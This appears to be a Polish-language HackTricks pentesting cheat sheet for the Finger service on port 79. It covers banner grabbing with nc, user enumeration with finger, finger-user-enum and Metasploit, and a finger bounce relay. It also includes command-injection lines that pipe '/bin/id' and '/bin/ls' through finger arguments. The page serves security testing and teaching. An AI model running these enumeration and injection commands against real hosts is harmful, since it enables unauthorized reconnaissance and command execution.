# 79 - Pentesting Finger {{#include ../banners/hacktricks-training.md}} ## **Podstawowe informacje** Program/usługa **Finger** jest wykorzystywana do uzyskiwania szczegółów o użytkownikach komputerów. Zazwyczaj dostarczane informacje obejmują **nazwę logowania użytkownika, pełne imię i nazwisko**, a w niektórych przypadkach dodatkowe szczegóły. Te dodatkowe informacje mogą obejmować lokalizację biura i numer telefonu (jeśli dostępne), czas, kiedy użytkownik się zalogował, okres bezczynności (czas bezczynności), ostatni moment, w którym użytkownik przeczytał wiadomość e-mail, oraz zawartość plików planów i projektów użytkownika. **Domyślny port:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **Enumeracja** ### **Zbieranie banerów/Podstawowe połączenie** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **Enumaracja użytkowników** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` Alternatywnie możesz użyć **finger-user-enum** z [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), kilka przykładów: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap wykonuje skrypt przy użyciu domyślnych skryptów** ### Metasploit używa więcej sztuczek niż Nmap ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan - `port:79 USER` ## Wykonanie polecenia ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [Użyj systemu jako przekaźnika finger](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ``` {{#include ../banners/hacktricks-training.md}}